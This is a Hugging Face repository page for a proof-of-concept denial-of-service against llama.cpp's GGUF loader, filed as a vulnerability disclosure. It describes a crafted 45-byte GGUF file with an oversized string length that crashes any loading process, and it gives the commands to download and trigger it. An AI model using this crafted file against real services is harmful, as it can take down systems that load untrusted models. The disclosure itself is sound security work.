You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

PoC: llama.cpp GGUF Scalar String β†’ std::terminate() DoS

CVE: Pending (submitted to huntr Model Format Vulnerabilities)
Target: ggml-org/llama.cpp commit 492bc31 (b103 / v0.9.7)
File: ggml/src/gguf.cpp β€” gguf_read_emplace_helper<std::string>() lines 309–315
Impact: Process termination (SIGABRT) on any binary that loads the model

PoC File

poc_inv_mfv04.gguf β€” 45 bytes. A valid GGUF v3 file with one KV entry where the string length field is set to 0x8000000000000000, exceeding std::string::max_size() on all 64-bit platforms. This triggers an uncaught std::length_error β†’ std::terminate() β†’ SIGABRT.

Reproduce

git clone https://github.com/ggml-org/llama.cpp
cd llama.cpp
cmake -B build -DCMAKE_BUILD_TYPE=Release
cmake --build build --parallel --target llama-gguf-split
wget https://huggingface.co/jrey8343/poc-llama-cpp-gguf-dos/resolve/main/poc_inv_mfv04.gguf
./build/bin/llama-gguf-split --split --dry-run poc_inv_mfv04.gguf /tmp/_out
# Expected: libc++abi: terminating due to uncaught exception of type std::length_error
# Exit code: -6 (SIGABRT)

Root Cause

The array string path in gguf_read_emplace_helper is protected by try/catch for std::length_error. The scalar string path (is_array=false) has no such protection and calls dst.resize(attacker_controlled_size) unchecked.

Downloads last month
12
GGUF
Model size
0 params
Architecture
undefined
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support